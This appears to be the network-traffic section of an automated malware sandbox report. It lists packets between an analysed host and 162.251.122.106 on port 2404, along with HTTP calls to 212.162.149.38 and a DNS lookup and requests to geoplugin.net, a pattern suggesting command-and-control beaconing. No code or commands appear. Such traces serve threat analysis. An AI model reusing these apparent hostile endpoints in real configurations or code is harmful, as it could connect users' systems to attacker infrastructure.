Nov 4, 2024 09:27:38.905045986 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.905112028 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.905123949 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.905153036 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.905229092 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.905241013 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.905251980 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.905263901 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.905287027 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.905313015 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.905380011 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.905391932 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.905464888 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.905474901 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.905478001 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.905545950 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.905545950 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.905551910 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.905565023 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.905575991 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.905590057 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.905615091 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.905615091 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.905690908 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.905702114 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.905733109 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.905834913 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.905853033 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.905864954 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.905878067 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.905884027 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.905894995 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.905909061 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.905913115 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.905913115 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.905921936 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.905934095 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.905946016 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.905967951 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.905992031 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.906181097 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.906198025 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.906217098 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.906229019 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.906232119 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.906241894 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.906279087 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.906279087 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.906395912 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.906407118 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.906419039 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.906452894 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.906517029 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.906528950 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.906541109 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.906553030 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.906579971 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.906579971 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.906637907 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.906723976 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.906734943 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.906745911 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.906761885 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.906761885 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.906799078 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.906841993 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.906857967 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.906869888 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.906918049 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.906938076 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.906950951 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.906985998 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.907062054 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.907073021 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.907082081 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.907093048 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.907104015 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.907123089 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.907124043 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.907196999 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.907243967 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.907346010 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.907356977 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.907370090 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.907381058 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.907391071 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.907403946 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.907411098 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.907411098 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.907416105 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.907428980 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.907443047 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.907496929 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.907608032 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.907620907 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.907632113 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.907644987 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.907655001 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.907680035 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.907680035 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.908147097 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.908190966 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.908194065 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.908209085 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.908283949 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.908313990 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.908327103 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.908337116 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.908348083 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.908385992 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.908385992 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.908533096 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.908546925 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.908551931 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.908561945 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.908572912 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.908584118 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.908584118 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.908601046 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.908621073 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.908621073 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.908792019 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.908802032 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.908812046 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.908823013 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.908834934 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.908845901 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.908857107 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.908857107 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.908857107 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.908906937 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.908906937 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.909025908 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.909037113 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.909046888 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.909080982 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.909164906 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.909176111 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.909184933 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.909195900 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.909235001 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.909235001 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.909425020 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.909435034 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.909445047 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.909488916 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.909488916 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.909563065 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.909574032 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.909584045 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.909594059 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.909632921 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.909632921 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.909708023 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.909733057 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.909744024 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.909754992 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.909765959 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.909794092 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.909833908 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.909868956 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.909934998 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.910012960 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.910023928 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.910032988 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.910043955 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.910058975 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.910068035 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.910068989 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.910080910 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.910082102 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.910094023 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.910108089 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.910137892 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.910180092 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.910309076 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.910320044 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.910415888 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.910449982 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.910478115 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.910490036 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.910521984 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.910521984 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.910635948 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.910646915 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.910656929 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.910667896 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.910708904 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.910708904 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.910757065 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.910768032 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.910828114 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.910897970 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.910908937 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.910918951 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.910932064 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.910943031 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.910953999 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.910964966 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.910979033 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.910979033 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.911072016 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.911156893 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.911169052 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.911179066 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.911190033 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.911201000 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.911217928 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.911217928 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.911261082 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.911308050 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.911324024 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.911367893 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.911376953 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.911390066 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.911398888 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.911413908 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.911425114 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.911441088 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.911468029 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.911624908 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.911636114 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.911644936 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.911655903 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.911684990 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.911684990 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.911773920 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.911786079 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.911832094 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.911930084 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.911941051 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.911950111 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.911961079 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.911972046 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.911973000 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.911983967 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.911995888 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.912003994 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.912008047 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.912015915 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.912020922 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.912031889 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.912044048 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.912050962 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.912050962 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.912098885 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.912450075 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.912461042 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.912471056 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.912489891 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.912501097 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.912503958 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.912513971 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.912524939 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.912534952 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.912544012 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.912545919 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.912559032 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.912564993 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.912570000 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.912581921 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.912591934 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.912594080 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.912594080 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.912606001 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.912623882 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.912678003 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.930092096 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.943124056 CET  80  49712  178.237.33.50  192.168.2.8
Nov 4, 2024 09:27:38.943176031 CET  49712  80  192.168.2.8  178.237.33.50
Nov 4, 2024 09:27:40.787827969 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:40.792764902 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:40.792783976 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:40.792856932 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:40.792867899 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:40.792876959 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:40.792877913 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:40.792887926 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:40.792907953 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:40.792917967 CET  2404  49711  162.251.122.106  192.168.2.8
                                      Nov 4, 2024 09:27:40.792921066 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:40.792999029 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:40.793013096 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:40.797785044 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:40.797796011 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:40.797811985 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:40.797821999 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:40.798046112 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:40.798058033 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:40.798094988 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:40.854855061 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:40.860208988 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:40.860282898 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:28:04.915246010 CET240449710162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:28:04.916692972 CET497102404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:28:04.922219992 CET240449710162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:28:34.928684950 CET240449710162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:28:34.930104017 CET497102404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:28:34.935127020 CET240449710162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:29:05.119784117 CET240449710162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:29:05.121045113 CET497102404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:29:05.125920057 CET240449710162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:29:21.128061056 CET4971280192.168.2.8178.237.33.50
                                      Nov 4, 2024 09:29:21.128149986 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:29:21.133444071 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:29:21.135535955 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:29:21.612137079 CET4971280192.168.2.8178.237.33.50
                                      Nov 4, 2024 09:29:22.221553087 CET4971280192.168.2.8178.237.33.50
                                      Nov 4, 2024 09:29:23.424639940 CET4971280192.168.2.8178.237.33.50
                                      Nov 4, 2024 09:29:25.924680948 CET4971280192.168.2.8178.237.33.50
                                      Nov 4, 2024 09:29:30.924669027 CET4971280192.168.2.8178.237.33.50
                                      Nov 4, 2024 09:29:35.132473946 CET240449710162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:29:35.136171103 CET497102404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:29:35.141051054 CET240449710162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:29:40.612184048 CET4971280192.168.2.8178.237.33.50
                                      Nov 4, 2024 09:30:05.177146912 CET240449710162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:30:05.178607941 CET497102404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:30:05.183445930 CET240449710162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:30:35.187555075 CET240449710162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:30:35.189225912 CET497102404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:30:35.194077969 CET240449710162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:31:05.219089031 CET240449710162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:31:05.222171068 CET497102404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:31:05.227040052 CET240449710162.251.122.106192.168.2.8
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 4, 2024 09:27:36.942615032 CET | 50702 | 53 | 192.168.2.8 | 1.1.1.1
Nov 4, 2024 09:27:36.949572086 CET | 53 | 50702 | 1.1.1.1 | 192.168.2.8

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 4, 2024 09:27:36.942615032 CET | 192.168.2.8 | 1.1.1.1 | 0xb9a8 | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 4, 2024 09:27:36.949572086 CET | 1.1.1.1 | 192.168.2.8 | 0xb9a8 | No error (0) | geoplugin.net | (none) | 178.237.33.50 | A (IP address) | IN (0x0001) | false
                                      • 212.162.149.38
                                      • geoplugin.net
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
